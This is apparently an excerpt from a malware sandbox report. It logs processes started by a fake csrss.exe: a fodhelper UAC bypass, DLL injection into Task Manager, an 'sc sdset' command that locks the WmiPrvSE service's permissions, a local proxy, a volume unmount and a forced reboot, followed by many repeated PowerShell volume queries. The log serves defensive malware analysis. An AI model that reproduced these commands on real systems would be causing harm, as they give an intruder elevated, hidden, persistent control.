        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
